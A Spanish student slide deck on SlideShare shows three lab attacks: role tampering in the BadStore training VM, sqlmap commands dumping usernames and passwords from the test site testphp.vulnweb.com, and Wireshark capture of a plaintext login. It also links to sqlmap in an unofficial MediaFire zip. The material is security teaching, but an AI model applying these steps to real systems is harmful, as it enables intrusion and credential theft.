SlideShare una empresa de Scribd logo
1 de 49
Descargar para leer sin conexión
Seguridad en Bases de Datos
1)Atacando Badstore 
2)Utilización de sqlmap 
3)Utilización de wireshark
1. 
Badstore es un iso que simula una tienda virtual, la cual es utilizada para ataques informáticos sin generar destrozos. Arranca bajo una distribución Trinux. Es importante saber que dicha aplicación se monta en una máquina virtual como si estuviésemos instalando un nuevo sistema operativo.
Una vez instalada Badstore, aparecerá una pantalla negra, damos enter, digitamos el comando ifconfig y así obtenemos la ip inet addr (que para el caso es 192.168.190.132), la cual ubicamos en nuestro navegador. Así estamos listos para empezar nuestra explotación de vulnerabilidades del sitio. 
1.
1.
1. 
Nuestro ataque a Badstore lo llevaremos a cabo utilizando un complemento de Mozilla Firefox llamado Tamper Data. Procedemos a entrar a nuestra tienda online.
1. 
Nos registramos como usuarios
1. 
Antes de dar clic en registro, ejecutamos Tamper Data
1. 
Una vez ejecutado el complemento damos clic en Comenzar Modificación
1. 
A continuación nos aparece una ventana de ejecución donde cambiamos el role de U (usuario) a A (admin) y doy clic en Aceptar.
1. 
Procedo a ingresar a la página como el administrador (en la dirección que aparece en el navegador, al final y después del signo igual (=) elimino lo que esta escrito y pongo la palabra admin)
1. 
Visualizo mi menú como Administrador
1. 
Como Administrador puedo ver el reporte de ventas.
1. 
Como Administrador puedo ver el lista de usuarios del sistema con usuario, contraseña, email, etc.
1. 
Como Administrador puedo eliminar usuarios. Probaremos eliminando al Administrador real del sistema.
1. 
Como Administrador tengo acceso a información de la variables del entorno
1. 
Como Administrador tengo acceso a información de la variables del entorno
2) 
Para ejecutar sqlmap, primero debemos descargar la versión mas actualizada de Python de acuerdo al sistema operativo donde vamos a ejecutar sqlmap. La descarga la llevamos a cabo desde la página oficial de python www.python.org/downloads/, descargamos el ejecutable y procedemos con la respectiva instalación. 
Para descargar sqlmap, lo podemos hacer desde la siguiente página http://www.mediafire.com/download/4oo7egc8f58i9ig/SQLmap+By+Julieinstein.zip, descargamos y descomprimimos el archivo. 
Es importante aclarar que tanto Python como sqlmap deben quedar en la misma unidad de disco.
2) 
Posteriormente ejecutamos el símbolo del sistema y nos ubicamos en la unidad donde tenemos guardado el sqlmap
2) 
Desde el símbolo del sistema ejecutamos los comandos para atacar el sitio web http://testphp.vulnweb.com.
2) 
Verificamos la vulnerabilidad de nuestro sitio agregando un apóstrofe después del signo igual (=) al final de la dirección que aparece en nuestra barra de direcciones, al hacerlo obtenemos lo siguiente:
2) 
Detectada la vulnerabilidad, procedemos a averiguar el nombre de la de datos ejecutando el siguiente comando: sqlmap.py -u (Objetivo) –dbs, obteniendo el siguiente resultado: 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 – dbs
2) 
Una vez identificadas las bases de datos, procedemos a extraer información de una de ellas, para este caso vamos a trabajar sobre la base de datos denominada “acuart”, dado que en la otra base de datos están disponibles datos y estadísticas del escanneo realizado. 
Sin embargo con el siguiente comando podemos identificar la base de datos que utiliza el sitio: sqlmap.py -u (Objetivo) --current-db 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db
2) 
Ahora vamos a extraer el nombre de las tablas de nuestra base de datos con el siguiente comando: sqlmap.py -u (Objetivo) -D (nombre BD) --tables 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart --tables
2) 
Ahora vamos a extraer las columnas de la tabla “users” utilizando el siguiente comando: sqlmap.py -u (Objetivo) -D acuart -T (tabla) --columns 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users --columns
2) 
Ahora procedemos a extraer los datos de algunas columnas de la tabla users, ejecutando el siguiente comando: sqlmap.py -u (Objetivo) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) –dump. Name: John Smith. 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C name --dump
2) 
email: email@email.com. 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C email --dump
2) 
pass: test. 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C pass --dump
2) 
uname: test. 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C uname --dump
2) 
Hacemos una pequeña prueba con los datos extraídos:
2) 
Y corroboramos que efectivamente nuestro ataque produjo resultados exitosos.
3) 
Descargamos wireshark de su página oficial http://www.wireshark.org/download.html, para este caso decidimos descargar la versión 1.10.10. Descargamos el ejecutable y procedemos con la instalación. Finalizada la instalación ejecutamos el software.
3) 
Damos clic en Interface List, seleccionamos Conexión de red inalámbrica, clic en Start y empieza el análisis.
3) 
Análisis en proceso….
3) 
Probemos algunos filtros… 
1.Con el filtro ip.addr==(ip de la maquina a escuchar), podemos escuchar una máquina específica. Obviamente ésta debe estar siendo analizada.
3) 
2.El filtro http, nos permite mostrar el protocolo de las páginas que no tiene encriptación. Vamos a proceder a ejecutar nuestro navegador e ingresaremos a la página http://bajaebooks.com/. Sustraeremos el usuario (con su respectiva contraseña) que se ha logueado en la página.
3) 
Logueándonos en la página. Posteriormente regresamos a wireshark.
3) 
Al lado del campo para insertar el filtro está la opción expression, damos clic y nos ubicamos en http y desplegamos sus opciones.
3) 
Y seleccionamos la opción http.request.method, clic en ok y clic en Apply. Como se mencionó anteriorment, la idea es averiguar el usuario con su contraseña del sitio a donde ha ingresado.
3) 
Obteniendo lo siguiente. Damos doble clic al paquete seleccionado (azul).
3) 
Obteniendo la siguiente información:
3) 
Ingresamos al paquete cuya petición es del tipo post:
3) 
Revisamos la información que contiene…
3) 
Desplegamos la línea “Line-based text data: application/x- www-form-urlencoded” y obtenemos lo siguiente:
3) 
En efecto, tenemos la información del usuario y su contraseña.
3) 
Este es el correo de confirmación cuando nos registramos en la pagina http://bajaebooks.com/
3) 
3.Si deseamos conocer a que servidores se conectó a través de las peticiones DNS, aplicamos el filtro dns:
3) 
En la opción “file” Wireshark nos da la opción de imprimir, guardar, etc. nuestra captura .
*http://es.scribd.com/doc/203905837/Introduccion-a-BadStore 
*https://www.youtube.com/watch?v=_wwYuilkn8M 
*https://www.youtube.com/watch?v=9nJseCl7QbI 
*https://www.youtube.com/watch?v=-C9TEBIfyrg

Más contenido relacionado

La actualidad más candente

Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Red Team Operasyonu ve İzlenen Bir Sisteme Sızmak
Red Team Operasyonu ve İzlenen Bir Sisteme SızmakRed Team Operasyonu ve İzlenen Bir Sisteme Sızmak
Red Team Operasyonu ve İzlenen Bir Sisteme SızmakBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3BGA Cyber Security
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciPRISMA CSI
 
Exploring DarkWeb For Threat Intelligence (SACON May 2018)
Exploring DarkWeb For Threat Intelligence (SACON May 2018)Exploring DarkWeb For Threat Intelligence (SACON May 2018)
Exploring DarkWeb For Threat Intelligence (SACON May 2018)Priyanka Aash
 
Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Svetlin Nakov
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavRomansh Yadav
 
Politicas de seguridad en linux
Politicas de seguridad en linuxPoliticas de seguridad en linux
Politicas de seguridad en linuxDaniel Zavala
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Presentación de ciberseguridad
Presentación de ciberseguridad Presentación de ciberseguridad
Presentación de ciberseguridad SilvanaVergara2
 

La actualidad más candente (20)

Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanning
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Guia para desarrollo de software seguro
Guia para desarrollo de software seguroGuia para desarrollo de software seguro
Guia para desarrollo de software seguro
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
 
Red Team Operasyonu ve İzlenen Bir Sisteme Sızmak
Red Team Operasyonu ve İzlenen Bir Sisteme SızmakRed Team Operasyonu ve İzlenen Bir Sisteme Sızmak
Red Team Operasyonu ve İzlenen Bir Sisteme Sızmak
 
Ağ Temelleri - Caner Köroğlu
Ağ Temelleri - Caner KöroğluAğ Temelleri - Caner Köroğlu
Ağ Temelleri - Caner Köroğlu
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
 
Exploring DarkWeb For Threat Intelligence (SACON May 2018)
Exploring DarkWeb For Threat Intelligence (SACON May 2018)Exploring DarkWeb For Threat Intelligence (SACON May 2018)
Exploring DarkWeb For Threat Intelligence (SACON May 2018)
 
Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
BGA Pentest Hizmeti
BGA Pentest HizmetiBGA Pentest Hizmeti
BGA Pentest Hizmeti
 
Politicas de seguridad en linux
Politicas de seguridad en linuxPoliticas de seguridad en linux
Politicas de seguridad en linux
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
PowerPoint Seguridad Informática
PowerPoint Seguridad InformáticaPowerPoint Seguridad Informática
PowerPoint Seguridad Informática
 
Presentación de ciberseguridad
Presentación de ciberseguridad Presentación de ciberseguridad
Presentación de ciberseguridad
 

Destacado (11)

SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
 
Ataque por dns spooging y troyano
Ataque por dns spooging y troyanoAtaque por dns spooging y troyano
Ataque por dns spooging y troyano
 
Al instalar el iso de badstore
Al instalar el iso de badstoreAl instalar el iso de badstore
Al instalar el iso de badstore
 
Seguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque TroyanoSeguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque Troyano
 
Seguridad bd ataque spoofing
Seguridad bd ataque spoofingSeguridad bd ataque spoofing
Seguridad bd ataque spoofing
 
Seguridad BD Ataque Spoofing
Seguridad BD Ataque SpoofingSeguridad BD Ataque Spoofing
Seguridad BD Ataque Spoofing
 
Havij
HavijHavij
Havij
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Metasploit Class: Shellshock Attack
Metasploit Class: Shellshock AttackMetasploit Class: Shellshock Attack
Metasploit Class: Shellshock Attack
 

Similar a Ataque por inyección de código sql y sniffing

Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)
Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)
Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)Pablo Alvarez Doval
 
Mancero silvia p1-gestió d'incidències.odt
Mancero silvia p1-gestió d'incidències.odtMancero silvia p1-gestió d'incidències.odt
Mancero silvia p1-gestió d'incidències.odtSilvia Mancero
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 
Manual para-instalar-oracle-database-11 g-r2-en-centos-6
Manual para-instalar-oracle-database-11 g-r2-en-centos-6Manual para-instalar-oracle-database-11 g-r2-en-centos-6
Manual para-instalar-oracle-database-11 g-r2-en-centos-6shac Rob
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Trabajo pdf
Trabajo pdfTrabajo pdf
Trabajo pdfpilargoh
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Interconexión entre sistemas operativos
Interconexión entre sistemas operativosInterconexión entre sistemas operativos
Interconexión entre sistemas operativosPol Grandes
 

Similar a Ataque por inyección de código sql y sniffing (20)

Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
Present3
Present3Present3
Present3
 
Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)
Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)
Depuración Avanzada Con Win Dbg Y Vs 2010 (Basica)
 
Mancero silvia p1-gestió d'incidències.odt
Mancero silvia p1-gestió d'incidències.odtMancero silvia p1-gestió d'incidències.odt
Mancero silvia p1-gestió d'incidències.odt
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Manual para-instalar-oracle-database-11 g-r2-en-centos-6
Manual para-instalar-oracle-database-11 g-r2-en-centos-6Manual para-instalar-oracle-database-11 g-r2-en-centos-6
Manual para-instalar-oracle-database-11 g-r2-en-centos-6
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Taller
TallerTaller
Taller
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Trabajo pdf
Trabajo pdfTrabajo pdf
Trabajo pdf
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Interconexión entre sistemas operativos
Interconexión entre sistemas operativosInterconexión entre sistemas operativos
Interconexión entre sistemas operativos
 

Último

El sistema solar el gran descubrimiento del sistema solar .pptx
El sistema solar el gran descubrimiento del sistema solar .pptxEl sistema solar el gran descubrimiento del sistema solar .pptx
El sistema solar el gran descubrimiento del sistema solar .pptxYoladsCabarcasTous
 
17 PRACTICAS - MODALIDAAD FAMILIAAR.docx
17 PRACTICAS - MODALIDAAD FAMILIAAR.docx17 PRACTICAS - MODALIDAAD FAMILIAAR.docx
17 PRACTICAS - MODALIDAAD FAMILIAAR.docxmarthaarroyo16
 
tipos de organización y sus objetivos y aplicación
tipos de organización y sus objetivos y aplicacióntipos de organización y sus objetivos y aplicación
tipos de organización y sus objetivos y aplicaciónJonathanAntonioMaldo
 
Croquis de riesgo de trabajo gasolinera.pdf
Croquis de riesgo de trabajo gasolinera.pdfCroquis de riesgo de trabajo gasolinera.pdf
Croquis de riesgo de trabajo gasolinera.pdfhernestosoto82
 
que son los planes de ordenamiento predial POP.pptx
que son los planes de ordenamiento predial  POP.pptxque son los planes de ordenamiento predial  POP.pptx
que son los planes de ordenamiento predial POP.pptxSergiothaine2
 
2024 2024 202420242024PPT SESIÓN 03.pptx
2024 2024 202420242024PPT SESIÓN 03.pptx2024 2024 202420242024PPT SESIÓN 03.pptx
2024 2024 202420242024PPT SESIÓN 03.pptxccordovato
 
CUESTIONARIO A ADICCION A REDES SOCIALES.pdf
CUESTIONARIO A ADICCION A REDES SOCIALES.pdfCUESTIONARIO A ADICCION A REDES SOCIALES.pdf
CUESTIONARIO A ADICCION A REDES SOCIALES.pdfEDUARDO MAMANI MAMANI
 
La importancia de las pruebas de producto para tu empresa
La importancia de las pruebas de producto para tu empresaLa importancia de las pruebas de producto para tu empresa
La importancia de las pruebas de producto para tu empresamerca6
 
Análisis de un mapa de riesgos de una tortillería
Análisis de un mapa de riesgos de una tortillería Análisis de un mapa de riesgos de una tortillería
Análisis de un mapa de riesgos de una tortillería yocelynsanchezerasmo
 
Mapa de riesgos de un taller mecánico 405
Mapa de riesgos de un taller mecánico 405Mapa de riesgos de un taller mecánico 405
Mapa de riesgos de un taller mecánico 405rodrimarxim
 
LA LEY DE LAS XII TABLAS en el curso de derecho
LA LEY DE LAS XII TABLAS en el curso de derechoLA LEY DE LAS XII TABLAS en el curso de derecho
LA LEY DE LAS XII TABLAS en el curso de derechojuliosabino1
 
HABILESASAMBLEA Para negocios independientes.pdf
HABILESASAMBLEA Para negocios independientes.pdfHABILESASAMBLEA Para negocios independientes.pdf
HABILESASAMBLEA Para negocios independientes.pdfGEINER22
 
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdf
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdfREPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdf
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdfIrapuatoCmovamos
 
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRIL
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRILPREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRIL
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRILeluniversocom
 
ESTUDIO DE IMPACTO AMBIENTAL de explotación minera.pptx
ESTUDIO DE IMPACTO AMBIENTAL de  explotación minera.pptxESTUDIO DE IMPACTO AMBIENTAL de  explotación minera.pptx
ESTUDIO DE IMPACTO AMBIENTAL de explotación minera.pptxKatherineFabianLoza1
 
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRIL
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRILPREGUNTA J DE CONSULTA POPULAR 21 DE ABRIL
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRILeluniversocom
 
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdf
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdfREPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdf
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdfIrapuatoCmovamos
 
DIPLOMA DE CERTIFICADO EQQW_removed.pptx
DIPLOMA DE CERTIFICADO EQQW_removed.pptxDIPLOMA DE CERTIFICADO EQQW_removed.pptx
DIPLOMA DE CERTIFICADO EQQW_removed.pptxKaterin yanac tello
 
Niveles de organización biologica clase de biologia
Niveles de organización biologica clase de biologiaNiveles de organización biologica clase de biologia
Niveles de organización biologica clase de biologiatongailustraconcienc
 
Presentación informe 'Fondos Next Generation European Union destinados a actu...
Presentación informe 'Fondos Next Generation European Union destinados a actu...Presentación informe 'Fondos Next Generation European Union destinados a actu...
Presentación informe 'Fondos Next Generation European Union destinados a actu...Ivie
 

Último (20)

El sistema solar el gran descubrimiento del sistema solar .pptx
El sistema solar el gran descubrimiento del sistema solar .pptxEl sistema solar el gran descubrimiento del sistema solar .pptx
El sistema solar el gran descubrimiento del sistema solar .pptx
 
17 PRACTICAS - MODALIDAAD FAMILIAAR.docx
17 PRACTICAS - MODALIDAAD FAMILIAAR.docx17 PRACTICAS - MODALIDAAD FAMILIAAR.docx
17 PRACTICAS - MODALIDAAD FAMILIAAR.docx
 
tipos de organización y sus objetivos y aplicación
tipos de organización y sus objetivos y aplicacióntipos de organización y sus objetivos y aplicación
tipos de organización y sus objetivos y aplicación
 
Croquis de riesgo de trabajo gasolinera.pdf
Croquis de riesgo de trabajo gasolinera.pdfCroquis de riesgo de trabajo gasolinera.pdf
Croquis de riesgo de trabajo gasolinera.pdf
 
que son los planes de ordenamiento predial POP.pptx
que son los planes de ordenamiento predial  POP.pptxque son los planes de ordenamiento predial  POP.pptx
que son los planes de ordenamiento predial POP.pptx
 
2024 2024 202420242024PPT SESIÓN 03.pptx
2024 2024 202420242024PPT SESIÓN 03.pptx2024 2024 202420242024PPT SESIÓN 03.pptx
2024 2024 202420242024PPT SESIÓN 03.pptx
 
CUESTIONARIO A ADICCION A REDES SOCIALES.pdf
CUESTIONARIO A ADICCION A REDES SOCIALES.pdfCUESTIONARIO A ADICCION A REDES SOCIALES.pdf
CUESTIONARIO A ADICCION A REDES SOCIALES.pdf
 
La importancia de las pruebas de producto para tu empresa
La importancia de las pruebas de producto para tu empresaLa importancia de las pruebas de producto para tu empresa
La importancia de las pruebas de producto para tu empresa
 
Análisis de un mapa de riesgos de una tortillería
Análisis de un mapa de riesgos de una tortillería Análisis de un mapa de riesgos de una tortillería
Análisis de un mapa de riesgos de una tortillería
 
Mapa de riesgos de un taller mecánico 405
Mapa de riesgos de un taller mecánico 405Mapa de riesgos de un taller mecánico 405
Mapa de riesgos de un taller mecánico 405
 
LA LEY DE LAS XII TABLAS en el curso de derecho
LA LEY DE LAS XII TABLAS en el curso de derechoLA LEY DE LAS XII TABLAS en el curso de derecho
LA LEY DE LAS XII TABLAS en el curso de derecho
 
HABILESASAMBLEA Para negocios independientes.pdf
HABILESASAMBLEA Para negocios independientes.pdfHABILESASAMBLEA Para negocios independientes.pdf
HABILESASAMBLEA Para negocios independientes.pdf
 
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdf
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdfREPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdf
REPORTE-HEMEROGRÁFICO-MARZO-2024-IRAPUATO-¿CÓMO VAMOS?.pdf
 
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRIL
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRILPREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRIL
PREGUNTA K DE LA CONSULTA POPULAR 21 DE ABRIL
 
ESTUDIO DE IMPACTO AMBIENTAL de explotación minera.pptx
ESTUDIO DE IMPACTO AMBIENTAL de  explotación minera.pptxESTUDIO DE IMPACTO AMBIENTAL de  explotación minera.pptx
ESTUDIO DE IMPACTO AMBIENTAL de explotación minera.pptx
 
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRIL
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRILPREGUNTA J DE CONSULTA POPULAR 21 DE ABRIL
PREGUNTA J DE CONSULTA POPULAR 21 DE ABRIL
 
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdf
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdfREPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdf
REPORTE DE INCIDENCIA DELICTIVA MARZO 2024.pdf
 
DIPLOMA DE CERTIFICADO EQQW_removed.pptx
DIPLOMA DE CERTIFICADO EQQW_removed.pptxDIPLOMA DE CERTIFICADO EQQW_removed.pptx
DIPLOMA DE CERTIFICADO EQQW_removed.pptx
 
Niveles de organización biologica clase de biologia
Niveles de organización biologica clase de biologiaNiveles de organización biologica clase de biologia
Niveles de organización biologica clase de biologia
 
Presentación informe 'Fondos Next Generation European Union destinados a actu...
Presentación informe 'Fondos Next Generation European Union destinados a actu...Presentación informe 'Fondos Next Generation European Union destinados a actu...
Presentación informe 'Fondos Next Generation European Union destinados a actu...
 

Ataque por inyección de código sql y sniffing

  • 2. 1)Atacando Badstore 2)Utilización de sqlmap 3)Utilización de wireshark
  • 3. 1. Badstore es un iso que simula una tienda virtual, la cual es utilizada para ataques informáticos sin generar destrozos. Arranca bajo una distribución Trinux. Es importante saber que dicha aplicación se monta en una máquina virtual como si estuviésemos instalando un nuevo sistema operativo.
  • 4. Una vez instalada Badstore, aparecerá una pantalla negra, damos enter, digitamos el comando ifconfig y así obtenemos la ip inet addr (que para el caso es 192.168.190.132), la cual ubicamos en nuestro navegador. Así estamos listos para empezar nuestra explotación de vulnerabilidades del sitio. 1.
  • 5. 1.
  • 6. 1. Nuestro ataque a Badstore lo llevaremos a cabo utilizando un complemento de Mozilla Firefox llamado Tamper Data. Procedemos a entrar a nuestra tienda online.
  • 7. 1. Nos registramos como usuarios
  • 8. 1. Antes de dar clic en registro, ejecutamos Tamper Data
  • 9. 1. Una vez ejecutado el complemento damos clic en Comenzar Modificación
  • 10. 1. A continuación nos aparece una ventana de ejecución donde cambiamos el role de U (usuario) a A (admin) y doy clic en Aceptar.
  • 11. 1. Procedo a ingresar a la página como el administrador (en la dirección que aparece en el navegador, al final y después del signo igual (=) elimino lo que esta escrito y pongo la palabra admin)
  • 12. 1. Visualizo mi menú como Administrador
  • 13. 1. Como Administrador puedo ver el reporte de ventas.
  • 14. 1. Como Administrador puedo ver el lista de usuarios del sistema con usuario, contraseña, email, etc.
  • 15. 1. Como Administrador puedo eliminar usuarios. Probaremos eliminando al Administrador real del sistema.
  • 16. 1. Como Administrador tengo acceso a información de la variables del entorno
  • 17. 1. Como Administrador tengo acceso a información de la variables del entorno
  • 18. 2) Para ejecutar sqlmap, primero debemos descargar la versión mas actualizada de Python de acuerdo al sistema operativo donde vamos a ejecutar sqlmap. La descarga la llevamos a cabo desde la página oficial de python www.python.org/downloads/, descargamos el ejecutable y procedemos con la respectiva instalación. Para descargar sqlmap, lo podemos hacer desde la siguiente página http://www.mediafire.com/download/4oo7egc8f58i9ig/SQLmap+By+Julieinstein.zip, descargamos y descomprimimos el archivo. Es importante aclarar que tanto Python como sqlmap deben quedar en la misma unidad de disco.
